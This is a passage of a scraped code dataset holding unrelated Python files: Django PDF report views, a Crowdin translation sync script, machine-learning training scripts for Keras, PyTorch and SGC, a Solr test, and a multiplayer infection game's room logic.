connected_components(markers2D, background=0)\n","sub_path":"scripts/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"203836026","text":"from django.shortcuts import render\n# -*- coding: utf-8 -*-\nfrom .models import department, employee, truck_type, truck, truck_list_report, truck_header_report\nfrom .models import master_package, dn_list_report, dn_header_report\nfrom .models import po_header_report, supplier, replacement_list_report, replacement_header_report\nfrom django.http import HttpResponse\n\nfrom django.template.loader import render_to_string\nfrom weasyprint import HTML\nfrom mysite.utils import render_to_pdf #created in step 4\n\nimport math\nimport tempfile\n\ndef index(request):\n return render(request, 'blog/index.html', {})\n\ndef truck_control(request):\n return render(request, 'blog/truck_control.html', {})\n\ndef delivery_note(request):\n return render(request, 'blog/delivery_note.html', {})\n\ndef replacement_order(request):\n return render(request, 'blog/replacement_order.html', {})\n\ndef truck_control_pdf(request):\n page = 10\n\n all_count = truck_list_report.objects.count()\n all_page_no = math.ceil(all_count/page)\n\n \"\"\"Generate pdf.\"\"\"\n list_pdf = []\n for i in range(0, all_page_no):\n query_max = (i+1)*page\n if query_max > all_count:\n query_max = all_count\n header_report = truck_header_report.objects.filter(truck_control_no= '1234')\n list_report = truck_list_report.objects.all().order_by('list_no')[(i*page):query_max]\n html_string = render_to_string('blog/truck_control.html', {'header_report':header_report, 'list_report': list_report, 'start_index': (i*page), 'page_no': (i+1), 'all_page_no': all_page_no})\n pdf = HTML(string=html_string)\n list_pdf.append(pdf)\n \n lid_render = []\n val = []\n boo_first = True\n pdf_data = None\n\n for pdf in list_pdf:\n if boo_first:\n boo_first = False\n pdf_data = pdf.render()\n lid_render.append(pdf.render())\n\n for doc in lid_render:\n for p in doc.pages:\n val.append(p)\n\n pdf_file = pdf_data.copy(val).write_pdf() # use metadata of pdf_first\n\n http_response = HttpResponse(pdf_file, content_type='application/pdf')\n http_response['Content-Disposition'] = 'attachment; filename=\"truck_control.pdf\"'\n\n return http_response\n\ndef index_pdf(request):\n \"\"\"Generate pdf.\"\"\"\n # Model data\n #entryreport = Entry.objects.all().order_by('rating')\n\n # Rendered\n html_string = render_to_string('blog/index.html')\n html = HTML(string=html_string)\n result = html.write_pdf()\n # Creating http response\n response = HttpResponse(content_type='application/pdf;')\n response['Content-Disposition'] = 'inline; filename=truck_control.pdf'\n response['Content-Transfer-Encoding'] = 'binary'\n with tempfile.NamedTemporaryFile(delete=True) as output:\n output.write(result)\n output.flush()\n output = open(output.name, 'rb')\n response.write(output.read())\n\n return response\n\ndef delivery_note_pdf(request):\n page = 10\n\n all_count = dn_list_report.objects.count()\n all_page_no = math.ceil(all_count/page)\n\n \"\"\"Generate pdf.\"\"\"\n \n list_pdf = []\n for i in range(0, all_page_no):\n query_max = (i+1)*page\n if query_max > all_count:\n query_max = all_count\n header_report = dn_header_report.objects.filter(dn_no='KOCH200923001')\n list_report = dn_list_report.objects.all().order_by('list_no')[(i*page):query_max]\n html_string = render_to_string('blog/delivery_note.html', {'header_report': header_report, 'list_report': list_report, 'start_index': (i*page), 'page_no': (i+1), 'all_page_no': all_page_no})\n pdf = HTML(string=html_string)\n list_pdf.append(pdf)\n \n lid_render = []\n val = []\n boo_first = True\n pdf_data = None\n\n for pdf in list_pdf:\n if boo_first:\n boo_first = False\n pdf_data = pdf.render()\n lid_render.append(pdf.render())\n\n for doc in lid_render:\n for p in doc.pages:\n val.append(p)\n\n pdf_file = pdf_data.copy(val).write_pdf() # use metadata of pdf_first\n\n http_response = HttpResponse(pdf_file, content_type='application/pdf')\n http_response['Content-Disposition'] = 'attachment; filename=\"deliver_note_report.pdf\"'\n\n return http_response\n\ndef replacement_order_pdf(request):\n page = 8\n\n all_count = replacement_list_report.objects.count()\n all_page_no = math.ceil(all_count/page)\n\n \"\"\"Generate pdf.\"\"\"\n \n list_pdf = []\n for i in range(0, all_page_no):\n query_max = (i+1)*page\n if query_max > all_count:\n query_max = all_count\n header_report = replacement_header_report.objects.filter(replacement_no='RN-202009-001')\n list_report = replacement_list_report.objects.all().order_by('list_no')[(i*page):query_max]\n html_string = render_to_string('blog/replacement_order.html', {'header_report': header_report, 'list_report': list_report, 'start_index': (i*page), 'page_no': (i+1), 'all_page_no': all_page_no})\n pdf = HTML(string=html_string)\n list_pdf.append(pdf)\n \n lid_render = []\n val = []\n boo_first = True\n pdf_data = None\n\n for pdf in list_pdf:\n if boo_first:\n boo_first = False\n pdf_data = pdf.render()\n lid_render.append(pdf.render())\n\n for doc in lid_render:\n for p in doc.pages:\n val.append(p)\n\n pdf_file = pdf_data.copy(val).write_pdf() # use metadata of pdf_first\n\n http_response = HttpResponse(pdf_file, content_type='application/pdf')\n http_response['Content-Disposition'] = 'attachment; filename=\"replacement_order_report.pdf\"'\n\n return http_response\n","sub_path":"NAAN/report/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"575452968","text":"# -*- coding: utf-8 -*-\n\nimport io\nimport os\nimport zipfile\n\nimport requests\nfrom git import Repo\n\nimport secrets\n\n\nlanguage_transition = {\n 'cs': 'cs',\n 'de': 'de',\n # 'en': 'en',\n 'es-ES': 'es',\n 'fr': 'fr',\n 'hu': 'hu',\n 'it': 'it',\n 'ko': 'ko',\n 'pl': 'pl',\n 'pt-BR': 'pt',\n 'ru': 'ru',\n 'sk': 'sk',\n 'tr': 'tr',\n 'uk': 'uk',\n 'zh-CN': 'zh',\n}\n\n\nclass Crowdin(object):\n\n _supported_languages = None\n _translation_status = None\n\n def __init__(self, project_identifier, project_key):\n self.project_identifier = project_identifier\n self.project_key = project_key\n\n @classmethod\n def supported_languages(cls):\n if cls._supported_languages is None:\n cls._supported_languages = {\n language['crowdin_code']: language\n for language in requests.get(\n 'https://api.crowdin.com/api/supported-languages?json=mycallback'\n ).json()\n }\n return cls._supported_languages\n\n def translation_status(self):\n if self._translation_status is None:\n self._translation_status = {\n language['code']: language\n for language in requests.post(\n 'https://api.crowdin.com/api/project/'\n '{project_identifier}/status?key={project_key}&json=mycallback'.format(\n project_identifier=self.project_identifier,\n project_key=self.project_key,\n )\n ).json()\n }\n return self._translation_status\n\n def export(self):\n return requests.get(\n 'https://api.crowdin.com/api/project/'\n '{project_identifier}/export?key={project_key}&json=mycallback'.format(\n project_identifier=self.project_identifier,\n project_key=self.project_key,\n )\n ).json()\n\n def download(self, lang):\n response = requests.get(\n 'https://api.crowdin.com/api/project/'\n '{project_identifier}/download/{lang}.zip?key={project_key}'.format(\n project_identifier=self.project_identifier,\n project_key=self.project_key,\n lang=lang,\n ),\n stream=True,\n )\n return zipfile.ZipFile(io.BytesIO(response.content))\n\n\nif __name__ == '__main__':\n c = Crowdin(secrets.PROJECT_IDENTIFIER, secrets.PROJECT_KEY)\n\n repo = Repo(os.path.join(os.path.dirname(__file__), 'tutorial'))\n c.export()\n for code in language_transition:\n repo.heads.master.checkout()\n repo.create_head('crowdin-translation-{}'.format(\n language_transition[code]\n ))\n repo.heads['crowdin-translation-{}'.format(\n language_transition[code]\n )].checkout()\n\n with c.download(code) as zip_f:\n for src_name in zip_f.namelist():\n dst_name = os.path.join(\n 'tutorial',\n language_transition[code],\n *os.path.normpath(src_name).split(os.sep)[2:]\n )\n\n if src_name.endswith('/'):\n if not os.path.exists(dst_name):\n os.makedirs(dst_name)\n continue\n\n with open(dst_name, 'bw+') as dst_f:\n dst_f.write(zip_f.read(src_name))\n repo.index.add([os.path.join(\n language_transition[code],\n *os.path.normpath(src_name).split(os.sep)[2:]\n )])\n repo.index.commit('crowdin-translation-{}'.format(\n language_transition[code]\n ))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"353594035","text":"import json\n\nfrom src.errors import Container\nfrom src.handler import error\n\n\ndef test_getter(question_number, test_number, test_set, code):\n if question_number not in test_set:\n raise Container(error(\n f\"Question {question_number} not found in homework\", code))\n if test_number not in test_set[question_number]:\n raise Container(\n error(\n f\"Test {test_number} not found in Question {question_number}\",\n code))\n return test_set[question_number][test_number]\n\n\ndef load_tests_path(tests_path, test_data, test_expected):\n with open(tests_path, \"r\") as f:\n data = json.load(f)\n\n test_data.update(data[\"input\"])\n test_expected.update(data[\"expected\"])\n\n\ndef extract_argument(data, arg_name):\n try:\n return data[arg_name]\n except KeyError:\n raise Container(error(f\"Missing argument `{arg_name}`\", \"missing_arg\"))\n","sub_path":"autocorrect-server/src/homeworks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"120352656","text":"import os \nimport sys\nimport shutil \nimport random\nimport time\nimport pandas as pd\nimport networkx as nx\n#sys.path.append('/home/social-sim/Documents/SocialSimCodeTesting/gcn/preprocess_DARPA_data/process_data/')\nfrom under_test_prepare_matrices import get_ordered_features_and_adjM_matrices\nfrom under_test_prepare_matrices import get_features_adjM_data\n\ndb = 'twitter_cve'\nbase = '/home/social-sim/Documents/SocialSimCodeTesting/GCN/sgc'\npath1 = 'preprocess_DARPA_data/process_data'\npath2 = 'pytorch/SGC-master/data'\n\n\ndef one_complete_run(kibana_matrix,A,subject,feat_cols, predictors, pr_col,k,epo,b_inx, top, network_file):\n\n\tprint('Changing directory to prepare new data...')\n\tos.chdir(base +'/'+ path1)\t \n\t#execfile('prepare_matrices.py')\n\n\tprint('Removing old data ...')\n\tfeat_matrix = '%s/%s/npz_data/%s/reddit_adj.npz'%(base,path1,db)\n\tadj_matrix = '%s/%s/npz_data/%s/reddit.npz'%(base,path1,db)\n\tif os.path.exists(feat_matrix):\n\t\tos.remove(feat_matrix)\n\tif os.path.exists(adj_matrix):\n\t\tos.remove(adj_matrix)\n\n\tprint('Execcuting prepare matrix codes ...')\n\t#os.system('python3 %s/%s/prepare_matrices.py %s\\t%s\\t%s'%(base,path1,pr_col,kibana_matrix,A))\n\tget_features_adjM_data(kibana_matrix,A,subject,feat_cols, pr_col) \n\n\tprint('Renaming new data...')\n\tos.rename('%s/%s/npz_data/%s/%s.npz'%(base,path1,db,db),'%s/%s/npz_data/%s/reddit.npz'%(base,path1,db))\n\tos.rename('%s/%s/npz_data/%s/%s_adj.npz'%(base,path1,db,db),'%s/%s/npz_data/%s/reddit_adj.npz'%(base,path1,db))\n\n\n\tprint('Changing directory to SGC...')\n\tos.chdir(base + '/'+ path2)\n\n\tprint('Removing old data ...')\n\tfeat_matrix = 'reddit_adj.npz'\n\tadj_matrix = 'reddit.npz'\n\tif os.path.exists(feat_matrix):\n\t\tos.remove(feat_matrix)\n\tif os.path.exists(adj_matrix):\n\t\tos.remove(adj_matrix)\n\n\tprint('Moving new data...')\n\tshutil.move('%s/%s/npz_data/%s/reddit_adj.npz'%(base,path1,db), '%s/%s/'%(base,path2))\n\tshutil.move('%s/%s/npz_data/%s/reddit.npz'%(base,path1,db), '%s/%s/'%(base,path2))\n\n\n\tprint('Changing directory to SGC...')\n\tos.chdir(base + '/'+ 'pytorch/SGC-master/')\n\n\tprint('Executing SGC reddit.py ...')\n\t#if pr_col != 'polarity':\n\tos.system('python3 reddit.py --pr_col %s --degree %s --subject %s --predictor %s --epochs %s --binx %s --top %s --netfile %s' %(pr_col,k,subject, predictors, epo,b_inx, top, network_file))\n\t#else:\n\t#os.system('python3 reddit.py --pr_col polarity')\n\n\ndef main():\n\tdb = 'twitter_cve'\n\tdir_ = '/home/social-sim/Documents/SocialSimCodeTesting/GCN/sgc/preprocess_DARPA_data/'\n\ttop_hashtags_file = dir_ + 'process_data/predicted_hashtags/%s/top_hashtags/50_largest_hashtags.csv'%db\n\t#top_hashtags = pd.read_csv(top_hashtags_file, sep=',',header = None,names=['hashtags','count'])['hashtags'].values[0:10]\n\tstart_time = time.time()\n\tn_iteration = 2\n\tbins_set = [[-1,0,1]]#,[-1,-0.5,0,0.5,1]]#,[-1,-0.75,-0.5,-0.25,0,0.25,0.5,0.75,1]]\n\tpr_col , subject, predictors= 'polarity_category', 'polarity_w_hashtags','topics'#'extension.subjectivity', 'subjectivity','hashtags'# ,'topics' # 'hashtags'# #'possibly_sensitive','sensitivity','hashtags' # 'topics' #'possibly_sensitive','sensitivity', 'topics' #'hashtags'#, # 'extension.polarity' #'possibly_sensitive_True','sensitivity' , 'topics'#\n\n\n\t#network_dir = dir_ + 'raw_data/twitter_cve/whole_network/'\n\tnetwork_dir = dir_ + 'raw_data/twitter_cve/communities/' #@@@@@ un comment this for communities\n\n\tfls = [ f for f in os.listdir(network_dir) if os.path.isfile(os.path.join(network_dir,f))]\n\tfor network_file in sorted(fls, reverse=True)[2:]:\n\t\tfor top in [600,20, 30,40,50,200, 100,400]:#[10,20,30,40]:\n\t\t\tfor b_inx, bins in enumerate(bins_set): \n\t\t\t\tkibana_matrix,A,feat_cols, pr_cols = get_ordered_features_and_adjM_matrices(bins, pr_col , subject, predictors, top, 'communities/%s'%network_file) #@@@@@ un comment this for communities\n\t\t\t\t#kibana_matrix,A,feat_cols, pr_cols = get_ordered_features_and_adjM_matrices(bins, pr_col , subject, predictors, top, network_file)\n\t\t\t\t\n\t\t\t\tif len(kibana_matrix)==0:\n\t\t\t\t\tcontinue\n\t\t\t\t'''\n\t\t\t\t############# predicting top k hashtags over degree (k)\n\t\t\t\tpr_col_log = base + '/'+ path1 + '/k_predicted _top_hashtags.csv'\n\t\t\t\tif os.path.exists(pr_col_log):\n\t\t\t\t\tos.remove(pr_col_log)\n\t\t\t\tresults_log = base + '/'+ path2 + '/k_top_hashtag_results.csv'\n\t\t\t\tif os.path.exists(results_log):\n\t\t\t\t\tos.remove(results_log)\n\t\t\t\tprint('getting feature matrix and adj matrix...')\n\t\t\t\tfor h in top_hashtags:\n\t\t\t\t\tfor k in [2,4,6, 8,10]:\n\t\t\t\t\t\tfor i in range(0,n_iteration):\n\t\t\t\t\t\t\tprint('************** iteration %s ***********'%i)\n\t\t\t\t\t\t\tone_complete_run(kibana_matrix,A,'test',h,k,200,b_inx)\n\n\t\t\t\t'''\n\t\t\t\t'''\n\t\t\t\t############# predicting random hashtags\n\t\t\t\tfor s in [1,50,100,150,200,250,300,350,400,450,500,550]:\n\t\t\t\t\tstart = s\n\t\t\t\t\tend = start + 5\n\t\t\t\t\tcol_list = [i for i in range(start,end)]\n\t\t\t\t\tpr_col_log = base + '/'+ path1 + '/predicted hashtags.csv'\n\t\t\t\t\tif os.path.exists(pr_col_log):\n\t\t\t\t\t\tos.remove(pr_col_log)\n\t\t\t\t\tresults_log = base + '/'+ path2 + '/hashtag_results.csv'\n\t\t\t\t\tif os.path.exists(results_log):\n\t\t\t\t\t\tos.remove(results_log)\n\t\t\t\t\tfor c in col_list:\n\t\t\t\t\t\tfor i in range(0,n_iteration):\n\t\t\t\t\t\t\tprint('************** iteration %s ***********'%i)\n\t\t\t\t\t\t\tone_complete_run(c)\n\n\t\t\t\t\tprint('Renaming results file...')\n\t\t\t\t\tos.rename('%s/%s/hashtag_results.csv'%(base,path2),'%s/%s/hashtag_results_%s_%s.csv'%(base,path2,start,end))\n\t\t\t\t\tos.rename('%s/%s/predicted hashtags.csv'%(base,path1),'%s/%s/predicted hashtags_%s_%s.csv'%(base,path1,start,end))\n\t\t\t\t'''\n\t\t\n\t\t\t\t############# predicting polarity \n\n\t\t\t\tresults_log = base + '/'+ path2 + '/%s_results.csv'%subject\n\t\t\t\tif os.path.exists(results_log):\n\t\t\t\t\tos.remove(results_log)\n\t\t\t\tfor epo in [50000]:\n\t\t\t\t\tfor k in [0,1,2,3,4,6,8]:\n\t\t\t\t\t\tfor i in range(0,n_iteration):\n\t\t\t\t\t\t\tprint('************** iteration %s ***********'%i)\n\t\t\t\t\t\t\tprint('File: ',network_file, '\\n Subject: ', subject, '\\n Predictors:', predictors,'\\n Epoc:', epo, '\\n Degree k:',k, '\\n Iteration: ',i )\t\t\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tone_complete_run(kibana_matrix,A,subject, feat_cols, predictors, pr_cols,k,epo,b_inx, top, network_file)\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\tcontinue\n\t\tprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\nmain()\n\n","sub_path":"sgc/preprocess_DARPA_data/process_data/files_under_test/under-test_auto_executing.py","file_name":"under-test_auto_executing.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"398985469","text":"from Data import Data\nfrom SolrCrud import SolrCrud\n\nq = SolrCrud()\n\n#insert test\ndata = Data(\"mkmid\",\"test test\",\"testtest test test\")\nq.add(data)\n\n#query test\nresults = q.query(\"*:*\")\nfor result in results:\n print(\"{0}-{1}\".format(result['id'], result['compName_s']))\n\n#delete test\nq.delete(\"mkmid\")","sub_path":"solr_crud/src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"413705303","text":"import random\nimport os\nimport shutil\nfrom model import cat_dog_classfiy_model\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom tqdm import tqdm\nfrom elasticsearch import Elasticsearch\nfrom escallback import ElasticCallback\n\nes_notifier = ElasticCallback()\nes_notifier.configure(\n job_name=\"cat_dog_classfiy_model\",\n es_client=Elasticsearch([\"elasticsearch.default\"]),\n)\n\n# prepare datasets\ndata_path = \"/datasets/\"\ndataset = os.listdir(data_path)\ntest_set = random.sample(dataset, int(len(dataset) * 0.2))\ntrain_set = set(dataset) - set(test_set)\n\n# move them to higher speed volumes, you should treat the path is exists or no there, and files too.\npaths = [\n \"/ssd/train_set/dog/\",\n \"/ssd/train_set/cat/\",\n \"/ssd/test_set/cat/\",\n \"/ssd/test_set/dog/\",\n \"/model/\",\n \"/weights/\",\n]\n\n# save model to yaml file\nmodel_yaml = cat_dog_classfiy_model.to_yaml()\nwith open(\"/model/model.yaml\", \"w\") as yaml_file:\n yaml_file.write(model_yaml)\n\nfor path in paths:\n if not os.path.exists(path):\n os.makedirs(path)\n\nwith tqdm(total=len(train_set), desc=\"copying train set\") as bar:\n for train in train_set:\n from_path = os.path.join(data_path, train)\n if train.startswith(\"dog\"):\n to_path = os.path.join(\"/ssd/train_set/dog/\", train)\n elif train.startswith(\"cat\"):\n to_path = os.path.join(\"/ssd/train_set/cat/\", train)\n if not os.path.exists(to_path):\n shutil.copy(from_path, to_path)\n bar.update(1)\n\nwith tqdm(total=len(train_set), desc=\"copying test set\") as bar:\n for test in test_set:\n from_path = os.path.join(data_path, test)\n if test.startswith(\"dog\"):\n to_path = os.path.join(\"/ssd/test_set/dog/\", test)\n elif test.startswith(\"cat\"):\n to_path = os.path.join(\"/ssd/test_set/cat/\", test)\n if not os.path.exists(to_path):\n shutil.copy(from_path, to_path)\n bar.update(1)\n\n\ntrain_datagen = ImageDataGenerator(rescale=1.0 / 255)\ntest_datagen = ImageDataGenerator(rescale=1.0 / 255)\ntraining_set = train_datagen.flow_from_directory(\n \"/ssd/train_set/\", target_size=(64, 64), batch_size=32, class_mode=\"binary\"\n)\ntest_set = test_datagen.flow_from_directory(\n \"/ssd/test_set\", target_size=(64, 64), batch_size=32, class_mode=\"binary\"\n)\n\n# feed dataset into model\ncat_dog_classfiy_model.fit_generator(\n training_set,\n steps_per_epoch=800,\n epochs=1, # last train, we found 12 epochs is enough\n validation_data=test_set,\n validation_steps=200,\n callbacks=[es_notifier],\n)\n\n# serialize weights to HDF5\ncat_dog_classfiy_model.save_weights(\"/weights/weights.h5\")\n# convert model and weights to onnx model\nonnx_model = onnxmltools.convert_keras(cat_dog_classfiy_model)\nonnxmltools.utils.save_model(onnx_model, '/model/trained.onnx')","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"130242846","text":"import numpy as np\nimport pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as data_utils\nimport torch\n\nimport torchvision\nfrom torchvision import transforms\nfrom PIL import Image\nfrom IPython import display\nfrom sklearn.metrics import accuracy_score\nfrom tqdm import tqdm\n\n\nclasses = os.listdir(\"./notMNIST_train\")\nn_classes = len(classes)\nclasses = sorted(classes)\nIMG_H = 28\nIMG_W = 28\n\nbatch_size = 64\n\ntrain_data = torchvision.datasets.ImageFolder('./notMNIST_train/', transform=transforms.Compose([\n transforms.Grayscale(num_output_channels=1),\n transforms.ToTensor()])\n )\ntrain_loader = data_utils.DataLoader(train_data, batch_size=batch_size, shuffle=True)\n\nval_data = torchvision.datasets.ImageFolder('./notMNIST_val/', transform=transforms.Compose([\n transforms.Grayscale(num_output_channels=1),\n transforms.ToTensor()])\n )\nval_loader = data_utils.DataLoader(val_data, batch_size=1, shuffle=False)\n\nhid_size = 100\nout_size = n_classes\n\n\nclass TwoLayerNet(nn.Module):\n def __init__(self, h, w, hid_size, out_size):\n super(TwoLayerNet, self).__init__()\n # объявляем слои для нашей сети\n self.linear1 = nn.Linear(h * w, hid_size)\n self.linear2 = nn.Linear(hid_size, out_size)\n\n def forward(self, x):\n x = self.linear1(x)\n # функция активации\n x = F.relu(x)\n x = self.linear2(x)\n return x\n\n\n\ntwo_layer_net = TwoLayerNet(h=IMG_H, w=IMG_W, hid_size=hid_size, out_size=out_size)\nloss_fn = torch.nn.modules.loss.CrossEntropyLoss()\nlearning_rate = 1e-3\noptimizer = torch.optim.SGD(two_layer_net.parameters(), lr=learning_rate)\ndef train(train_loader, val_loader, num_epochs=100):\n train_losses = []\n val_losses = []\n\n train_acc = []\n val_acc = []\n\n for epoch in range(num_epochs):\n display.clear_output(wait=True)\n\n # 1. forward\n two_layer_net.train(True)\n loss_batch = []\n acc_batch = []\n for x_train, y_train in train_loader:\n x_train = Variable(x_train.view(x_train.shape[0], -1))\n # 1.1 получаем предсказания сети\n y_pred = two_layer_net(x_train)\n # 1.2 вычисляем accuracy на данном батче по предсказаниями и правильным ответам\n acc_batch.append(accuracy_score(np.argmax(y_pred.data.cpu().numpy(), axis=1), y_train.numpy()))\n # 1.3 вычисляем loss (кросс-эетропию)\n loss_train = loss_fn(y_pred, Variable(y_train))\n # 1.4 backward\n loss_train.backward()\n # 1.5 обновляем\n optimizer.step()\n # 1.6 зануляем\n optimizer.zero_grad()\n # 1.7 запоминаем\n loss_batch.append(loss_train.data.cpu().numpy())\n\n train_losses.append(np.mean(loss_batch))\n train_acc.append(np.mean(acc_batch))\n\n # 2. val\n two_layer_net.train(False)\n loss_batch = []\n acc_batch = []\n for i, (x_val, y_val) in enumerate(val_loader):\n x_val = Variable(x_val.view(x_val.shape[0], -1))\n # 2.1 получаем предсказания сети\n y_pred = two_layer_net(x_val)\n acc_batch.append(accuracy_score(np.argmax(y_pred.data.cpu().numpy(), axis=1), y_val.numpy()))\n # 2.3 вычисляем loss (кросс-эетропию)\n loss_val = loss_fn(y_pred, Variable(y_val))\n # 2.4 запоминаем\n loss_batch.append(loss_val.data.cpu().numpy())\n\n val_losses.append(np.mean(loss_batch))\n val_acc.append(np.mean(acc_batch))\n\n # 3. будем сохранять модель в файл, если после этой эпохи loss упал\n torch.save(two_layer_net.state_dict(), 'Seminar_2_1.pt')\n\n # 4. show plot\n _, axes = plt.subplots(1, 2, figsize=(16, 6))\n\n plt.title(\"losses\")\n axes[0].plot(train_losses, label=\"train loss\")\n axes[0].plot(val_losses, label=\"val loss\")\n plt.legend()\n\n plt.title(\"accuracies\")\n axes[1].plot(train_acc, label=\"train accuracy\")\n axes[1].plot(val_acc, label=\"val accuracy\")\n plt.legend()\n\n plt.show()\n\n print(\"Final loss: \", val_losses[-1])\n print(\"Final accuracy: \", val_acc[-1])\n\ntrain(train_loader, val_loader, num_epochs=20)","sub_path":"07. Neural Networks Practice/sem2_1.py","file_name":"sem2_1.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"315228772","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# Generated file, DO NOT EDIT\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass BuildResourceUsage(Model):\n \"\"\"BuildResourceUsage.\n\n :param distributed_task_agents: The number of build agents.\n :type distributed_task_agents: int\n :param paid_private_agent_slots: The number of paid private agent slots.\n :type paid_private_agent_slots: int\n :param total_usage: The total usage.\n :type total_usage: int\n :param xaml_controllers: The number of XAML controllers.\n :type xaml_controllers: int\n \"\"\"\n\n _attribute_map = {\n 'distributed_task_agents': {'key': 'distributedTaskAgents', 'type': 'int'},\n 'paid_private_agent_slots': {'key': 'paidPrivateAgentSlots', 'type': 'int'},\n 'total_usage': {'key': 'totalUsage', 'type': 'int'},\n 'xaml_controllers': {'key': 'xamlControllers', 'type': 'int'}\n }\n\n def __init__(self, distributed_task_agents=None, paid_private_agent_slots=None, total_usage=None, xaml_controllers=None):\n super(BuildResourceUsage, self).__init__()\n self.distributed_task_agents = distributed_task_agents\n self.paid_private_agent_slots = paid_private_agent_slots\n self.total_usage = total_usage\n self.xaml_controllers = xaml_controllers\n","sub_path":"vsts/vsts/build/v4_1/models/build_resource_usage.py","file_name":"build_resource_usage.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"653857843","text":"import random\nfrom state import State\nfrom game_state import GameState\nfrom location import Location\n\nclass Room:\n def __init__(self):\n self.id = random.randrange(0, 10000)\n self.users = []\n self.game_state = GameState.NOT_STARTED\n self.nbPlayersWhoMoved = []\n self.nbPlayersWhoVoted = []\n self.round = 0\n self.selectioncheck = False\n self.infected = 0\n self.newcases = 0\n\n ### ROOM LOGIC\n\n def add_user(self, user):\n for existing_user in self.users:\n if user.name == existing_user.name:\n raise NameError(\"User with name \" + user.name + \" already exists. Please pick a new name.\")\n\n if len(self.users) == 0:\n user.admin=True\n\n self.users.append(user)\n print(\"added user \" + user.name + \" to the room\")\n return user\n\n def add_users(self, users):\n for user in users:\n self.add_user(user)\n\n def get_user(self, name):\n for user in self.users:\n if name == user.name:\n return user\n return None\n\n def get_healthy_users(self):\n return self.get_users_for_state(State.HEALTHY)\n\n def get_infected_users(self):\n return self.get_users_for_state(State.INFECTED)\n\n def get_users_for_state(self, state):\n if self.game_state == GameState.NOT_STARTED:\n return None\n else:\n infected_users = []\n for user in self.users:\n if user.state == state:\n infected_users.append(user)\n return infected_users\n\n ### ROUND LOGIC\n\n def start(self):\n self.game_state = GameState.PLAYING\n self.round = 1\n self.infected = 1\n self.newcases = 1\n self.nbPlayersWhoMoved = []\n self.nbPlayersWhoVoted = []\n self.selectioncheck = False\n self.reset_locations_and_votes()\n for user in self.users:\n user.heal()\n user.quarantineVisits = 0\n user.patient0 = False\n user.stayhome = False\n\n patient0 = random.choice(self.users)\n patient0.patient0 = True\n patient0.infect()\n\n def next_round(self):\n self.update_quarantine()\n self.update_users_state()\n self.heal_quarantined()\n self.count_infected()\n self.reset_round()\n return self.update_game_status()\n\n def reset_round(self):\n self.round += 1\n self.nbPlayersWhoMoved = []\n self.nbPlayersWhoVoted = []\n self.selectioncheck = False\n self.reset_locations_and_votes()\n\n def reset_locations_and_votes(self):\n for user in self.users:\n user.vote = None\n user.location = Location.HOME\n\n\n ### HANDLE USER INPUTS\n\n def move_user_location(self, name, location):\n user = self.get_user(name)\n user.move_location(Location[location])\n if user not in self.nbPlayersWhoMoved:\n self.nbPlayersWhoMoved.append(user)\n self.selection_check()\n print(str(self.nbPlayersWhoMoved) + \"number of players who moved\")\n\n def register_user_vote(self, name, vote):\n user = self.get_user(name)\n user.register_vote(self.get_user(vote))\n if user not in self.nbPlayersWhoVoted:\n self.nbPlayersWhoVoted.append(user)\n self.selection_check()\n print(str(self.nbPlayersWhoVoted) + \"number of players who voted\")\n\n ### GAME LOGIC\n\n def update_users_state(self):\n for location, users_in_location in self.get_locations_dict(self.users).items():\n if location == Location.HOME:\n for user in users_in_location:\n user.stayhome = False\n elif self.contains_infected(users_in_location):\n for user in users_in_location:\n user.infect()\n if location == Location.SUPERMARKET:\n for user in users_in_location:\n user.stayhome = True\n\n def update_quarantine(self):\n for nomination, users_who_voted in self.get_votes_dict(self.users).items():\n if len(users_who_voted)/len(self.users) > 0.501:\n nomination.quarantine()\n\n def update_game_status(self):\n if self.check_all_same_state(self.users, State.HEALTHY):\n self.game_state = GameState.GOOD_GUYS_WON\n elif self.check_all_same_state(self.users, State.INFECTED):\n self.game_state = GameState.BAD_GUYS_WON\n else:\n self.game_state = GameState.PLAYING\n\n def heal_quarantined(self):\n for user in self.users:\n if user.patient0 == True:\n user.state = State.INFECTED\n if user.quarantineVisits == 2:\n user.state = State.HEALTHY\n elif user.state == State.QUARANTINED:\n user.state = State.HEALTHY\n\n def count_infected(self):\n before = self.infected\n count = 0\n for user in self.users:\n if user.state == State.INFECTED:\n count += 1\n self.infected = count\n self.newcases = max(count - before, 0)\n\n def selection_check(self):\n if len(self.nbPlayersWhoMoved) == len(self.users) and len(self.nbPlayersWhoVoted) == len(self.users):\n self.selectioncheck = True\n\n @staticmethod\n def 